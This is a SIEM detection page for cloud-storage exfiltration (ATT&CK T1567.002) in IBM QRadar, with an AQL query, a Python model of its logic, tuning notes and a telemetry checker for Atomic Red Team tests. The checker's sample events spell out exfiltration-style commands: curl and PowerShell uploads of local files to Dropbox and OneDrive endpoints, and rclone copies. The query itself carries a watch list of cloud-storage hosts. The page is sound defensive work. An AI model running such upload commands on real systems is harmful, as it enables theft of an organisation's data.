Detect Exfiltration to Cloud Storage in IBM QRadar
Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services such as Dropbox, Google Drive, OneDrive, MEGA, and Amazon S3 allow storage and retrieval of data over the Internet. Exfiltration to these services can blend with legitimate enterprise traffic, providing significant cover. Real-world threat actors including Akira, Leviathan, POLONIUM, LuminousMoth, Mustang Panda, and Kimsuky have all leveraged cloud storage for data theft. Rclone is the most commonly observed tool, used by multiple ransomware and espionage groups to automate bulk transfers to attacker-controlled cloud accounts.
MITRE ATT&CK
- Tactic: Exfiltration
- Technique: T1567 Exfiltration Over Web Service
- Sub-technique: T1567.002 Exfiltration to Cloud Storage
- Canonical reference: https://attack.mitre.org/techniques/T1567/002/
QRadar Detection Query
SELECT DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') as EventTime,
logsourcename(logsourceid) as LogSource,
"sourceip" as SourceIP, "destinationip" as DestIP,
"Image" as ProcessImage, "DestinationHostname" as Hostname,
SUM("BytesSent") as TotalBytesSent,
CASE WHEN SUM("BytesSent") > 104857600 THEN 10
WHEN SUM("BytesSent") > 10485760 THEN 7
ELSE 4 END as RiskScore
FROM events
WHERE (
"DestinationHostname" ILIKE ANY ('%dropbox%','%googleapis.com%','%onedrive%','%box.com%',
'%mega.nz%','%wetransfer%','%mediafire%','%gofile.io%',
'%anonfiles%','%sendspace%')
AND "Direction" = 'outbound'
AND LOWER(coalesce("Image","")) NOT LIKE ANY ('%onedrive%','%googledrive%','%dropbox%','%backup%')
)
GROUP BY "sourceip", "Image", "DestinationHostname", FLOOR(devicetime/3600000)
HAVING TotalBytesSent > 10485760
ORDER BY TotalBytesSent DESC
Detects large outbound data transfers to cloud storage platforms in QRadar with volume-based risk scoring.
Data Sources
Required Tables
False Positives & Tuning
- OneDrive, Google Drive, and Dropbox desktop sync clients generating large uploads during normal backup or file sync operations
- DevOps pipelines using rclone, azcopy, or gsutil for legitimate CI/CD artifact uploads to cloud storage
- Backup software (Veeam, Acronis, BackBlaze) transferring large volumes to cloud-hosted S3-compatible backends
- Data engineering workflows using gsutil or AWS CLI to transfer datasets between cloud and on-premise environments
- Security tools performing cloud storage integrity checks or automated threat intelligence feeds pulling from S3/GCS
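The logic of the AQL query above, together with the process-image exclusion that the tuning list depends on, modelled in Python as an added example. This is not the page's query and not QRadar code; it mirrors the WHERE filters, the hourly GROUP BY bucket, the 10 MiB HAVING threshold and the CASE risk tiers, and runs them over a constructed event sample. Field names follow the query's columns; EventTime is reported as the start of the hour bucket, a simplification of the query's devicetime column. The hostnames and paths in the sample are constructed, not observed data.

```python
from collections import defaultdict
from datetime import datetime, timezone

# Patterns from the query's WHERE clause (substring, case-insensitive).
CLOUD_HOST_PATTERNS = ("dropbox", "googleapis.com", "onedrive", "box.com",
                       "mega.nz", "wetransfer", "mediafire", "gofile.io",
                       "anonfiles", "sendspace")
# Process images the query excludes: legitimate sync/backup clients.
IMAGE_EXCLUSIONS = ("onedrive", "googledrive", "dropbox", "backup")

MIB = 1024 * 1024
HAVING_THRESHOLD = 10 * MIB    # HAVING TotalBytesSent > 10485760
HOUR_MS = 3_600_000            # GROUP BY FLOOR(devicetime/3600000)


def risk_score(total_bytes):
    """CASE expression from the query: >100 MiB -> 10, >10 MiB -> 7, else 4."""
    if total_bytes > 100 * MIB:
        return 10
    if total_bytes > 10 * MIB:
        return 7
    return 4


def event_matches_where(event):
    """Apply the WHERE clause to one event dict."""
    host = (event.get("DestinationHostname") or "").lower()
    image = (event.get("Image") or "").lower()   # COALESCE("Image", "")
    return (any(p in host for p in CLOUD_HOST_PATTERNS)
            and event.get("Direction") == "outbound"
            and not any(x in image for x in IMAGE_EXCLUSIONS))


def detect(events):
    """Group matching events per source/image/host/hour, sum BytesSent,
    apply HAVING and ORDER BY. Returns rows as dicts, largest first."""
    totals = defaultdict(int)
    for ev in events:
        if event_matches_where(ev):
            key = (ev["sourceip"], ev.get("Image"), ev["DestinationHostname"],
                   ev["devicetime"] // HOUR_MS)
            totals[key] += ev["BytesSent"]
    rows = []
    for (src, image, host, hour), total in totals.items():
        if total > HAVING_THRESHOLD:
            bucket_start = datetime.fromtimestamp(hour * HOUR_MS / 1000, tz=timezone.utc)
            rows.append({
                "EventTime": bucket_start.strftime("%Y-%m-%d %H:%M:%S"),
                "SourceIP": src, "ProcessImage": image, "Hostname": host,
                "TotalBytesSent": total, "RiskScore": risk_score(total)})
    rows.sort(key=lambda r: r["TotalBytesSent"], reverse=True)
    return rows


# Constructed sample telemetry (not real data). devicetime is epoch milliseconds.
_T0 = 1_700_000_000_000


def _ev(src, image, host, direction, mib, offset_ms=0):
    return {"sourceip": src, "Image": image, "DestinationHostname": host,
            "Direction": direction, "BytesSent": mib * MIB,
            "devicetime": _T0 + offset_ms}


SAMPLE_EVENTS = [
    # Two rclone pushes to Dropbox within the same hour: summed to 120 MiB.
    _ev("10.0.0.5", r"C:\Tools\rclone.exe", "content.dropboxapi.com", "outbound", 60),
    _ev("10.0.0.5", r"C:\Tools\rclone.exe", "content.dropboxapi.com", "outbound", 60, 600_000),
    # OneDrive sync client: large, but dropped by the Image exclusion (tuning lever).
    _ev("10.0.0.7", r"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe",
        "example.onedrive.com", "outbound", 500),
    # curl to Google Cloud Storage: 2 MiB + 20 MiB in one hour crosses the threshold.
    _ev("10.0.0.9", r"C:\Windows\System32\curl.exe", "storage.googleapis.com", "outbound", 2),
    _ev("10.0.0.9", r"C:\Windows\System32\curl.exe", "storage.googleapis.com", "outbound", 20, 1_200_000),
    # Inbound download: ignored by the Direction filter.
    _ev("10.0.0.11", r"C:\Windows\System32\curl.exe", "content.dropboxapi.com", "inbound", 200),
    # Flow record with no process image (e.g. a firewall source): COALESCE keeps it.
    _ev("10.0.0.3", None, "api.mega.nz", "outbound", 15),
]

if __name__ == "__main__":
    for row in detect(SAMPLE_EVENTS):
        print(row)
```

Running it yields three rows: the rclone bucket at 120 MiB (risk 10), the curl bucket at 22 MiB (risk 7) and the image-less MEGA flow at 15 MiB (risk 7); the OneDrive sync upload never reaches the aggregation, which is exactly the effect of adding a sync client to the exclusion list. Extending IMAGE_EXCLUSIONS with a backup or CI agent image is the cheapest way to act on the false-positive cases listed above without raising the byte threshold for everyone.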
Testing Methodology
Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.
- Test 1: Rclone Exfiltration to Dropbox (Simulated with Local Filesystem Remote)
Expected signal: Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'copy' and the source path. A second Event ID 1 for the 'rclone config create' invocation with 'localtest local' arguments. Security Event ID 4688 if command line auditing is enabled.
- Test 2: curl Upload to Cloud Storage API Endpoint
Expected signal: Sysmon Event ID 1: Process Create with Image=curl.exe, CommandLine containing 'content.dropboxapi.com', '-X POST', and '--data-binary'. Sysmon Event ID 3: Network Connection attempted to content.dropboxapi.com:443. The connection will fail due to invalid token but process and network events are generated.
- Test 3: PowerShell Upload to OneDrive Graph API
Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, CommandLine containing 'graph.microsoft.com', 'Invoke-RestMethod', 'PUT', and 'content'. Sysmon Event ID 3: Network Connection to graph.microsoft.com:443. PowerShell ScriptBlock Log Event ID 4104 with the full upload script.
- Test 4: Rclone Configuration File Drop and Cloud Remote Enumeration
Expected signal: Sysmon Event ID 11: File Create for %APPDATA%\rclone\rclone.conf. Sysmon Event ID 1: Process Create with Image=rclone.exe, CommandLine containing 'listremotes' and '--config'. Security Event ID 4688 (if enabled) capturing the rclone invocation. The rclone.conf file creation event is a high-fidelity indicator per the hunting query targeting this artifact.
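A checker for the expected signals listed in the four tests above, as an added example that is not Atomic Red Team's or the page's own code. It encodes each test's expected events as field constraints and reports, for a given telemetry sample, which tests produced every expected record and which signals are missing. Field names (EventID, Image, CommandLine, DestinationHostname, DestinationPort, TargetFilename, ScriptBlockText) are the standard Sysmon and PowerShell event fields; the sample records are constructed, with placeholders in place of real API endpoints. Security Event ID 4688 is left out of the required set because the page conditions it on command-line auditing, and the 4104 match on the Graph hostname is an assumption. The sample deliberately lacks the 4104 record for Test 3 so the output shows what a ScriptBlock logging gap looks like.

```python
# Expected signals per test, taken from the list above. A rule is a set of
# field constraints: an int must match exactly, a list means every substring
# must appear (case-insensitive), a string is one case-insensitive substring.
EXPECTED_SIGNALS = {
    "Test 1": [
        {"EventID": 1, "Image": "rclone.exe", "CommandLine": ["copy"]},
        {"EventID": 1, "Image": "rclone.exe",
         "CommandLine": ["config", "create", "localtest", "local"]},
    ],
    "Test 2": [
        {"EventID": 1, "Image": "curl.exe",
         "CommandLine": ["content.dropboxapi.com", "-X POST", "--data-binary"]},
        {"EventID": 3, "DestinationHostname": "content.dropboxapi.com",
         "DestinationPort": 443},
    ],
    "Test 3": [
        {"EventID": 1, "Image": "powershell.exe",
         "CommandLine": ["graph.microsoft.com", "Invoke-RestMethod", "PUT", "content"]},
        {"EventID": 3, "DestinationHostname": "graph.microsoft.com",
         "DestinationPort": 443},
        # Assumed: the logged script block contains the Graph hostname.
        {"EventID": 4104, "ScriptBlockText": ["graph.microsoft.com"]},
    ],
    "Test 4": [
        {"EventID": 11, "TargetFilename": r"\rclone\rclone.conf"},
        {"EventID": 1, "Image": "rclone.exe",
         "CommandLine": ["listremotes", "--config"]},
    ],
}


def _field_matches(event, field, expected):
    actual = event.get(field)
    if actual is None:
        return False
    if isinstance(expected, list):
        return all(s.lower() in str(actual).lower() for s in expected)
    if isinstance(expected, int):
        return actual == expected
    return expected.lower() in str(actual).lower()


def event_satisfies(event, rule):
    return all(_field_matches(event, f, v) for f, v in rule.items())


def evaluate(events):
    """Per test, one bool per expected signal: was it seen in the telemetry?"""
    return {name: [any(event_satisfies(ev, rule) for ev in events) for rule in rules]
            for name, rules in EXPECTED_SIGNALS.items()}


def passing_tests(events):
    """Names of tests whose expected signals were all observed."""
    return sorted(name for name, hits in evaluate(events).items() if all(hits))


def missing_signals(events):
    """{test: [rule, ...]} for expected signals the telemetry did not contain."""
    return {name: [rule for rule, hit in zip(EXPECTED_SIGNALS[name], hits) if not hit]
            for name, hits in evaluate(events).items() if not all(hits)}


# Constructed telemetry sample: a field subset of Sysmon / PowerShell events.
SAMPLE_TELEMETRY = [
    {"EventID": 1, "Image": r"C:\Tools\rclone.exe",
     "CommandLine": "rclone.exe config create localtest local"},
    {"EventID": 1, "Image": r"C:\Tools\rclone.exe",
     "CommandLine": r"rclone.exe copy C:\Temp\sample localtest:C:\Temp\out"},
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": r"curl.exe -X POST https://content.dropboxapi.com/<endpoint> --data-binary @C:\Temp\sample.txt"},
    {"EventID": 3, "Image": r"C:\Windows\System32\curl.exe",
     "DestinationHostname": "content.dropboxapi.com", "DestinationPort": 443},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell.exe -Command "Invoke-RestMethod -Method PUT '
                    '-Uri https://graph.microsoft.com/<drive-item>/content -InFile C:\\Temp\\sample.txt"'},
    {"EventID": 3, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "DestinationHostname": "graph.microsoft.com", "DestinationPort": 443},
    # No Event ID 4104 here: ScriptBlock logging was not enabled on this host.
    {"EventID": 11, "Image": r"C:\Tools\rclone.exe",
     "TargetFilename": r"C:\Users\alice\AppData\Roaming\rclone\rclone.conf"},
    {"EventID": 1, "Image": r"C:\Tools\rclone.exe",
     "CommandLine": r"rclone.exe listremotes --config C:\Users\alice\AppData\Roaming\rclone\rclone.conf"},
]

if __name__ == "__main__":
    print("passing:", passing_tests(SAMPLE_TELEMETRY))
    print("missing:", missing_signals(SAMPLE_TELEMETRY))
```

On this sample Tests 1, 2 and 4 pass and Test 3 is reported with its 4104 rule missing, which points at the logging configuration rather than at the detection: Sysmon saw the process and the network connection, but without ScriptBlock logging the full upload script is never recorded. Feeding the checker real exported events after running the tests gives a quick confirmation that the log sources the QRadar rule depends on are actually wired up.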
References
- https://attack.mitre.org/techniques/T1567/002/
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md
- https://rclone.org/docs/
- https://www.secureworks.com/research/gold-sahara
- https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets
- https://www.microsoft.com/en-us/security/blog/2022/06/02/exposing-polonium-activity-and-infrastructure-targeting-israeli-organizations/
- https://www.bitdefender.com/files/News/CaseStudies/study/396/Bitdefender-PR-Whitepaper-LuminousMoth-creat5540-en-EN.pdf
- https://research.nccgroup.com/2021/06/15/responding-to-ransomware-rclone-and-the-many-flavors-of-data-exfiltration/
- https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/
- https://learn.microsoft.com/en-us/azure/storage/common/storage-ref-azcopy
- https://unit42.paloaltonetworks.com/stately-taurus-targets-myanmar-government/
- https://www.cisa.gov/sites/default/files/publications/AA21-291A.pdf